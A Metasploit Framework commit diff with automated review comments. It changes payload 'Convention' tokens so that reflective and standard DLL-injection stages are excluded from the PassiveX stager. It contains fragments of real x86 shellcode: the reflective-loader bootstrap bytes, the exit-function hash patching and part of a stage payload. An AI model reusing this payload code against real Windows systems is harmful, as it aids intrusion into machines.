Fixes #517. Disables meterpreter stages for passivex stagers

git-svn-id: file:///home/svn/framework3/trunk@7546 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-11-16 22:45:33 +00:00
parent 777317d0ad
commit dc0dc98771
5 changed files with 39 additions and 35 deletions


@ -17,7 +17,7 @@ module Payload::Windows::DllInject
'Name' => 'Windows Inject DLL',
'Version' => '$Revision$',
'Description' => 'Inject a custom DLL into the exploited process',
'Author' =>
'Author' =>
[
'jt <jt@klake.org>',
'skape',
@ -27,7 +27,7 @@ module Payload::Windows::DllInject
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => 'sockedi'
'Convention' => 'sockedi -passivex',
},
'Stage' =>
{
@ -233,4 +233,5 @@ module Payload::Windows::DllInject
end
end
end
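Review bot: The new `'Convention' => 'sockedi -passivex'` in the `@ -27,7` hunk encodes the exclusion as a bare token with a `-` prefix and nothing in the hash says what it means or why; the same token is added to ReflectiveDllInject in this commit and pairs with the `'sockedi passivex'` the PassiveX stager now advertises. A one-line comment above it would carry that, e.g. `# '-passivex' excludes the PassiveX stager (#517): this stage cannot be delivered by it`. Because the pairing presumably depends on exact token spelling between stager and stage, a typo in either string would silently leave the combination allowed rather than fail loudly, so the two spellings are worth checking together. The other two hunks in this section (the duplicated `'Author' =>` line and the `@ -233,4 +233,5` tail whose added line is not visible here) appear to be whitespace-only and could have been kept out of a functional change.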


@ -25,20 +25,20 @@ module Payload::Windows::ReflectiveDllInject
'References' => [ [ 'URL', 'http://www.harmonysecurity.com/ReflectiveDllInjection.html' ] ],
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => 'sockedi'
'PayloadCompat' =>
{
'Convention' => 'sockedi -passivex',
},
'Stage' =>
{
'Offsets' =>
{
'EXITFUNC' => [ 33, 'V' ]
},
'Payload' => ""
'Stage' =>
{
'Offsets' =>
{
'EXITFUNC' => [ 33, 'V' ]
},
'Payload' => ""
}
))
register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
end
@ -49,12 +49,12 @@ module Payload::Windows::ReflectiveDllInject
def stage_payload
dll = ""
offset = 0
begin
File.open( library_path, "rb" ) { |f| dll += f.read }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
@ -62,14 +62,14 @@ module Payload::Windows::ReflectiveDllInject
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
bootstrap = "\x4D" + # dec ebp ; M
"\x5A" + # pop edx ; Z
"\xE8\x00\x00\x00\x00" + # call 0 ; call next instruction
@ -89,21 +89,21 @@ module Payload::Windows::ReflectiveDllInject
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
"\x50" + # push eax ; some value for hinstance
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if( bootstrap.length > 62 )
print_error( "Reflective Dll Injection (x86) generated an oversized bootstrap!" )
return
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# return our stage to be loaded by the intermediate stager
return dll
end
end
end
end
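Review bot: The only substantive change in this section, `'Convention' => 'sockedi -passivex'` in the `@ -25,20` hunk, is buried in a re-print of the whole `PayloadCompat`/`Stage` block and a duplicated `raise` line that look like whitespace-only re-indentation, which makes the functional edit easy to miss in review. As with DllInject, the token deserves a comment, e.g. `# '-passivex' excludes the PassiveX stager (#517)`, so the next reader does not have to find this commit to learn what the `-` prefix does. Separately, in `stage_payload` the `raise "Can't find an exported ReflectiveLoader function!"` sits inside the `begin`/`rescue` whose bare `rescue` turns it into a `print_error` plus `return`, so callers receive `nil` for both a missing export and a parse failure with the distinction visible only in the printed message; `stage_payload` has lines omitted between the hunks, so this is based on the visible portion only.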


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -29,7 +29,7 @@ module Metasploit3
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::PassiveX,
'Convention' => 'sockedi',
'Convention' => 'sockedi passivex',
'Stager' =>
{
'Offsets' =>
@ -67,7 +67,7 @@ module Metasploit3
}
))
end
#
# Do not transmit the stage over the connection. We send the stage via an
# HTTP request.
@ -83,13 +83,13 @@ module Metasploit3
# we must manually patch in the exit funk for this stager as it uses the old hash values
# which are generated using a different algorithm to that of the new hash values. We do this
# as this stager code has not been rewritten using the new api calling technique (see block_api.asm).
# set a default exitfunk if one is not set
datastore['EXITFUNC'] = 'thread' if not datastore['EXITFUNC']
# retrieve the offset/pack type for this stager's exitfunk
offset, pack = offsets['EXITFUNC']
# patch in the appropriate exit funk (using the old exit funk hashes).
p[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore['EXITFUNC'] == 'seh'
p[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore['EXITFUNC'] == 'seh'
p[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore['EXITFUNC'] == 'thread'
p[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore['EXITFUNC'] == 'process'
@ -115,3 +115,4 @@ module Metasploit3
end
end
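Review bot: `'Convention' => 'sockedi passivex'` in the `@ -29,7` hunk introduces a second token whose purpose is only discoverable from the stages changed in the same commit; a comment such as `# 'passivex' lets stages opt out via '-passivex' in their PayloadCompat 'Convention' (#517)` would document the contract where it is declared. In the `@ -83,13` hunk the EXITFUNC patch chain handles only `'seh'`, `'thread'` and `'process'`, so any other value the option may accept leaves the offset unpatched with no message; if other values are possible, an `else` branch that prints an error would be cheap insurance. On style, `datastore['EXITFUNC'] = 'thread' if not datastore['EXITFUNC']` reads more idiomatically as `datastore['EXITFUNC'] = 'thread' unless datastore['EXITFUNC']`. The `@ -115,3 +115,4` tail shows two of its four new-side lines, so its added line cannot be reviewed here.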


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -60,9 +60,9 @@ module Metasploit3
def on_session(session)
super
if (datastore['AutoLoadStdapi'] == true)
session.load_stdapi
session.load_stdapi
if (framework.exploits.create(session.via_exploit).privileged?)
session.load_priv
session.load_priv
end
end
if (datastore['AutoRunScript'].empty? == false)
@ -72,4 +72,5 @@ module Metasploit3
end
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -37,7 +37,7 @@ module Metasploit3
{
'EXITFUNC' => [ 210, 'V' ]
},
'Payload' =>
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
@ -58,3 +58,4 @@ module Metasploit3
end
end